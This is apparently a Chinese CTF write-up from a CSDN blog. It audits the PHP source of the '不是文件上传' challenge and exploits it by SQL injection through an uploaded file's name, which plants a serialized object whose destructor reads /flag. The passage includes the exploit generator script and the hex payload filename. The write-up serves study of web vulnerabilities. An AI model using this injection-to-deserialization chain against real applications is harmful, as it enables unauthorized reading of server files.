# 安浔杯 (不是文件上传) WP

最新推荐文章于 2024-01-24 16:02:58 发布
最新推荐文章于 2024-01-24 16:02:58 发布
阅读量161 收藏
点赞数
分类专栏: BUUCTF web 文章标签: php 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/crisprx/article/details/111700746
版权

安浔杯 (不是文件上传)

源码审计

help.php

<?php
class helper {
	protected $folder = "pic/";
	protected $ifview = False; 
	protected $config = "config.txt";
	// The function is not yet perfect, it is not open yet.

	public function upload($input="file")
	{
		$fileinfo = $this->getfile($input);
		$array = array();
		$array["title"] = $fileinfo['title'];
		$array["filename"] = $fileinfo['filename'];
		$array["ext"] = $fileinfo['ext'];
		$array["path"] = $fileinfo['path'];
		$img_ext = getimagesize($_FILES[$input]["tmp_name"]);
		$my_ext = array("width"=>$img_ext[0],"height"=>$img_ext[1]);
		$array["attr"] = serialize($my_ext);
		$id = $this->save($array);
		if ($id == 0){
			die("Something wrong!");
		}
		echo "<br>";
		echo "<p>Your images is uploaded successfully. And your image's id is $id.</p>";
	}

	public function getfile($input)
	{
		if(isset($input)){
			$rs = $this->check($_FILES[$input]);
		}
		return $rs;
	}

	public function check($info)
	{
		$basename = substr(md5(time().uniqid()),9,16);
		$filename = $info["name"];
		$ext = substr(strrchr($filename, '.'), 1);
		$cate_exts = array("jpg","gif","png","jpeg");
		if(!in_array($ext,$cate_exts)){
			die("<p>Please upload the correct image file!!!</p>");
		}
	    $title = str_replace(".".$ext,'',$filename);
	    return array('title'=>$title,'filename'=>$basename.".".$ext,'ext'=>$ext,'path'=>$this->folder.$basename.".".$ext);
	}

	public function save($data)
	{
		if(!$data || !is_array($data)){
			die("Something wrong!");
		}
		$id = $this->insert_array($data);
		return $id;
	}

	public function insert_array($data)
	{	
		$con = mysqli_connect("127.0.0.1","r00t","r00t","pic_base");
		if (mysqli_connect_errno($con)) 
		{ 
		    die("Connect MySQL Fail:".mysqli_connect_error());
		}
		$sql_fields = array();
		$sql_val = array();
		foreach($data as $key=>$value){
			$key_temp = str_replace(chr(0).'*'.chr(0), '\0\0\0', $key);
			$value_temp = str_replace(chr(0).'*'.chr(0), '\0\0\0', $value);
			$sql_fields[] = "`".$key_temp."`";
			$sql_val[] = "'".$value_temp."'";
		}
		$sql = "INSERT INTO images (".(implode(",",$sql_fields)).") VALUES(".(implode(",",$sql_val)).")";
		mysqli_query($con, $sql);
		$id = mysqli_insert_id($con);
		mysqli_close($con);
		return $id;
	}

	public function view_files($path){
		if ($this->ifview == False){
			return False;
			//The function is not yet perfect, it is not open yet.
		}
		$content = file_get_contents($path);
		echo $content;
	}

	function __destruct(){
		# Read some config html
		$this->view_files($this->config);
	}
}

?>

show.php

<!DOCTYPE html>
<html>
<head>
	<title>Show Images</title>
	<link rel="stylesheet" href="./style.css">
	<meta http-equiv="content-type" content="text/html;charset=UTF-8"/>
</head>
<body>

<h2 align="center">Your images</h2>
<p>The function of viewing the image has not been completed, and currently only the contents of your image name can be saved. I hope you can forgive me and my colleagues and I are working hard to improve.</p>
<hr>

<?php
include("./helper.php");
$show = new show();
if($_GET["delete_all"]){
	if($_GET["delete_all"] == "true"){
		$show->Delete_All_Images();
	}
}
$show->Get_All_Images();

class show{
	public $con;

	public function __construct(){
		$this->con = mysqli_connect("127.0.0.1","r00t","r00t","pic_base");
		if (mysqli_connect_errno($this->con)){ 
   			die("Connect MySQL Fail:".mysqli_connect_error());
		}
	}

	public function Get_All_Images(){
		$sql = "SELECT * FROM images";
		$result = mysqli_query($this->con, $sql);
		if ($result->num_rows > 0){
		    while($row = $result->fetch_assoc()){
		    	if($row["attr"]){
		    		$attr_temp = str_replace('\0\0\0', chr(0).'*'.chr(0), $row["attr"]);
					$attr = unserialize($attr_temp);
				}
		        echo "<p>id=".$row["id"]." filename=".$row["filename"]." path=".$row["path"]."</p>";
		    }
		}else{
		    echo "<p>You have not uploaded an image yet.</p>";
		}
		mysqli_close($this->con);
	}

	public function Delete_All_Images(){
		$sql = "DELETE FROM images";
		$result = mysqli_query($this->con, $sql);
	}
}
?>

<p><a href="show.php?delete_all=true">Delete All Images</a></p>
<p><a href="upload.php">Upload Images</a></p>

</body>
</html>

upload.php

<!DOCTYPE html>
<html>
<head>
	<title>Image Upload</title>
	<link rel="stylesheet" href="./style.css">
	<meta http-equiv="content-type" content="text/html;charset=UTF-8"/>
</head>
<body>
<p align="center"><img src="https://i.loli.net/2019/10/06/i5GVSYnB1mZRaFj.png" width=300 length=150></p>
<div align="center">
<form name="upload" action=""  method="post" enctype ="multipart/form-data" >
    <input type="file" name="file">
    <input type="Submit" value="submit">
</form>
</div>

<br> 
<p><a href="./show.php">You can view the pictures you uploaded here</a></p>
<br>

<?php
include("./helper.php");
class upload extends helper {
	public function upload_base(){
		$this->upload();
	}
}

if ($_FILES){
	if ($_FILES["file"]["error"]){
		die("Upload file failed.");
	}else{
		$file = new upload();
		$file->upload_base();
	}
}

$a = new helper();
?>
</body>
</html>

定位关键处理

可以看到在show.phpshow类中存在Get_All_Images方法,其中会将数据库中存在的row[attr]进行反序列化,并且结合在help.php中出现魔术方法__destruct(),该方法会在进行反序列化时被调用,而该方法的内容为:

$this->view_files($this->config);

跟进$this->view_files方法发现:

public function view_files($path){
		if ($this->ifview == False){
			return False;
		}
		$content = file_get_contents($path);
		echo $content;
	}

存在任意文件读取的漏洞,当类属性$this->ifview==true能够读取$this->config指定路径的内容,因此想到该题目即是考察反序列化进行任意文件读取。因此回到$row[attr]的获得。

如何进行反序列化操作?

helper类中可以发现,进行将array数组存储到数据库的操作,并且存在:

		$img_ext = getimagesize($_FILES[$input]["tmp_name"]);
		$my_ext = array("width"=>$img_ext[0],"height"=>$img_ext[1]);
		$array["attr"] = serialize($my_ext);
		$id = $this->save($array);

题目逻辑是将上传图片的宽度和高度进行序列化压缩后存储到数据库中,并且$img_ext是被写死的,无法直接修改,因此通过这个途径存储到数据库的序列化数据是安全并且都是固定死的。

因此需要找其他入口点,此时发现数据库操作语句存在问题:

$sql = "INSERT INTO images (".(implode(",",$sql_fields)).") VALUES(".(implode(",",$sql_val)).")";

其中$sql_fileds是写死的,而$sql_val也没有进行任何过滤,直接进行拼接。而$sql_val$data数组的键值,而$data数组会经过helper->check()方法,因此分析该方法:

public function check($info)
	{
		$basename = substr(md5(time().uniqid()),9,16);
		$filename = $info["name"];
		$ext = substr(strrchr($filename, '.'), 1);
		$cate_exts = array("jpg","gif","png","jpeg");
		if(!in_array($ext,$cate_exts)){
			die("<p>Please upload the correct image file!!!</p>");
		}
	    $title = str_replace(".".$ext,'',$filename);
	    return array('title'=>$title,'filename'=>$basename.".".$ext,'ext'=>$ext,'path'=>$this->folder.$basename.".".$ext);
	}

可以发现$basename是不可控的,但是$title是完全可控,并且未经过过滤直接拼接到数据库操作语句中:

INSERT INTO images(`title`,`filename`,`ext`,`path`,`attr`) VALUES ($data[title],$data[filename],$data[ext],$data[path],$data[attr])

因此先构造反序列化exp

class helper{
    protected $config = '/flag';
    protected $ifview = true;
}
$exp = new helper();
echo bin2hex(serialize($exp));
#0x4f3a363a2268656c706572223a323a7b733a393a22002a00696676696577223b623a313b733a393a22002a00636f6e666967223b733a353a222f666c6167223b7d

因此修改filename=1','2','3','4',0x4f3a363a2268656c706572223a323a7b733a393a22002a00696676696577223b623a313b733a393a22002a00636f6e666967223b733a353a222f666c6167223b7d);#.png

在访问show.php即可得到flag

在这里插入图片描述

Crispr-bupt
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[安洵杯 2019]不是文件上传
m0_63045593的博客
04-22 2443
[安洵杯 2019]不是文件上传 信息泄露github的源码 public function view_files($path){ if ($this->ifview == False){ //不用管直接就是FALSE return False; //The function is not yet perfect, it is not open yet. } $content = file_get_contents($path); echo $con
安洵杯-crackme-wp
令则
12-02 2478
crackme 这是安洵杯2019的逆向题 链接:https://pan.baidu.com/s/16fb_-L-dE5knUPzkSFU5rQ 提取码:z405 文章目录crackme逆向分析逆向脚本: 逆向分析 首先在ida并没有发现什么加密位置 下面的check函数如下: 只是简单的判定,其中的str2为明文,而str1却是从未出现的量。 (其实看到这个就想到了base64,而且可以...
buu-WEB-不是文件上传
最新发布
m0_52061428的博客
01-24 464
他将传入的数据中的" * "替换成了"\0\0\0",符合这一要求的只有我们构建的序列化语句,所以我们也要进行操作。大致就是这么运行的,helper.php中没有被运行的有view_files()和__destruct()先快速审计一下,发现其余两个文件都在包含helper.php,所以着重看helper.php。这题主要考验代码审计能力和对sql的熟悉程度,不过有一说一,题量确实大。这里让我联想到了反序列化。_destruct被触发时,view_file才会被调用,并且view。这是他的三个php文件。
[安洵杯 2019]不是文件上传1
m0_62129839的博客
02-22 186
又因为上传的文件名中不能有双引号,所以将payload进行16进制编码,别忘了前面加上0x。这道题首先给了源码,但是我没看到,进了页面,他储存的文件并不保存在他数据库,也不像是sql注入,所以扫描文件,拿到源码,审计。第一个可疑的地方是show.php里面的$attr变量,这里有一个反序列化。最后用#注释掉’value2’,‘value3’,…我审计的时候没看到,wp告诉我的,实际上这个位置很明显。三行字信息量巨大,全是我不会的小细节。php序列化代码,抄wp的。的图片,查看,得到flag。
掘安杯wp分析文件
04-10
根据官方wp复现 和自己参赛记录整理记录的IDA分析文件
红帽杯wp红帽杯wp
05-06
红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp
WordPress配置文件wp-config.php详解
09-29
目录设置是关于WordPress中文件存储位置的自定义,比如上传的媒体文件、主题、插件等。在wp-config.php文件中可以指定这些目录的绝对路径,以避免在WordPress的设置中手动输入。此外,还可以通过添加特定的定义来...
CTF-7#GET THE PASS!-WP
10-23
-WP 本文将详细介绍 CTF-7#GET THE PASS!WP 竞赛的解决方案,包括工具的使用、上传和执行、获取管理员账户名和密码、修改 ACL 权限、打开文件和获取 flag 等。 一、工具介绍 在本次 CTF 竞赛中,我们需要使用一...
[安洵杯 2019]不是文件上传 文件上传的注入
m0_67401270的博客
05-15 288
进入题目传了一个jpg图片上去 发现文件名被重命名了,但是给了我们一个path路径(难道就是一个绕过题?这么轻松就会告诉你路径,跟题目有点不符) 啪啪打脸,各个地方抓一下包show.php,upload.php以及show.phpdelete_all=true,按照经验我们应该在某个地方是可以获取到这些源码的,但是我这里找了很久根本找不到……,只能再一次求助别人的wp…… 没想到的是!!! 根据这条信息去github找这个出题人 获得源码,好好代码审计了(不愧是锻炼搜索能力,获得源码的方式长见识了)
CTF--这好像不是文件上传
浅笑996的博客
06-28 706
打开题目F12看到一个被注释的跳转。 访问可以知道是一个文件包含 经过测试,该文件禁止了input、data关键字。并禁止了phar://协议。 使用php://filter读取题目源码得到 http://47.94.221.39:8003/index.php?filename=php://filter/read=convert.base64-encode/resource=index.php 读取upload.php文件源码如下: 可以看出upload文件将上传..
BUUCTF:[安洵杯 2019]不是文件上传
末初的CSDN博客
03-28 2091
这题和攻防世界XCTF:upload有点像,看似上传却都不是上传是上传图片的文件名注入 参考:安洵杯2019 官方Writeup 获取源码 在网站首页存在一些信息 在gihtub找得到源码 BUU也给出了这题的源码 漏洞分析 在图片上传处,check函数并未对文件名(title)进行检测, 直接传递到最后的SQL语句当中。导致了SQL注入,并且属于Insert注入。 审计代码后可知,图片...
[CISCN2019 总决赛 Day2 Web1]Easyweb && [GXYCTF2019]禁止套娃
crispr的博客
03-17 1331
[CISCN2019 总决赛 Day2 Web1]Easyweb 0X01 前言 现在开始记录BUUCTF上的web了,每周认真刷一些题,了解一些知识点和套路,不要让自己这么菜。。 0X02 正文 发现是一个登录界面,先从登录框fuzz一下,看能否万能密码通过,无果。 一般直接是登录框,肯定隐藏这其他目录或者是源码泄露,所以开始扫目录 dirsearch -u "http://1606db13-...
记[HCTF 2018]Hideandseek
crispr的博客
07-14 1127
记[HCTF 2018]Hideandseek 前言 一万年没刷题了,尽搞些杂七杂八的了,于是乎刷了一个题(自己给自己一个嘴巴子) 总结一下这个题的考点: zip 软链接实现任意文件读取 linux系统目录的熟悉 flask session伪造和加解密 正言 直接上题: 意图很明显,直接让你传zip文件,因此在这里想到可能是想让你进行zip软链接来读取其他文件,大晚上了,这里直接上写的exp吧: #coding=utf-8 import os import requests import sys u
代码审计_MRCTF_typecho 反序列化
crispr的博客
04-14 869
[MRCTF2020]Ezpop_Revenge 0x01 前言 感觉代码审计需要不断练习,提高自己看代码的能力,这次从两条pop链来分析反序列化漏洞吧。 0x02 正文 这个题是一个typecho 1.2的框架,扫目录发现www.zip源码泄露,下载后进行审计,看到flag.php: <?php if(!isset($_SESSION)) session_start(); if($_SE...
1.5 BUUCTF 练习题
crispr的博客
01-05 627
1.5 BUUCTF 练习题 [PwnThyBytes 2019]Baby_SQL 发现是一个登录页面,并且题目是SQL注入,因此想到肯定是利用登录页面进行SQL注入,尝试无果,由于点击create没有变化,抓包发现注释/source.zip下载得到源码 源码分析 只贴出部分关键源码 //index.php <?php session_start(); foreach ($_SESSION as $key => $value): $_SESSION[$key] = filter($value
有道云笔记 渗透测试文件上传核题wp
10-12
有道云笔记是一款文件管理和云存储平台,用户可以将各种文件上传至云端进行保存和管理。针对有道云笔记的渗透测试的文件上传核题,主要是测试目标是否存在文件上传漏洞。 文件上传漏洞是指攻击者通过上传恶意文件或者利用上传功能绕过限制,成功在目标服务器上执行任意代码或者获取未授权的访问权限。攻击者可通过上传特定类型的文件,利用后台执行逻辑漏洞或者文件解析漏洞,从而实现对目标系统的攻击或控制。 针对有道云笔记的文件上传漏洞,常见的测试方法包括: 1. 尝试上传各种类型的文件:测试能否上传系统可执行文件、脚本文件或者危险的文件类型。 2. 绕过后台验证:尝试修改请求报文、绕过文件类型检查、篡改上传文件路径等,测试服务器是否能正确地执行上传操作的检查。 3. 文件解析漏洞测试:测试上传的文件是否能够被服务器直接解析,并且触发对应的解析漏洞。 4. 文件重命名与遍历:测试能否修改上传文件的文件名,并尝试通过../等目录遍历操作访问到其他敏感文件。 针对发现的漏洞和问题,需要将测试结果整理成详细的渗透测试报告,包括漏洞描述、危害程度评估和修复建议等。然后与有道云笔记的开发团队和管理员进行沟通,提供测试结果和修复建议,并跟踪漏洞修复进展。 及时发现和修复文件上传漏洞,对于保护用户数据和防止潜在的攻击十分重要。因此,有道云笔记应该充分重视渗透测试的文件上传核题,加强安全意识和漏洞修复的流程,确保用户数据的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值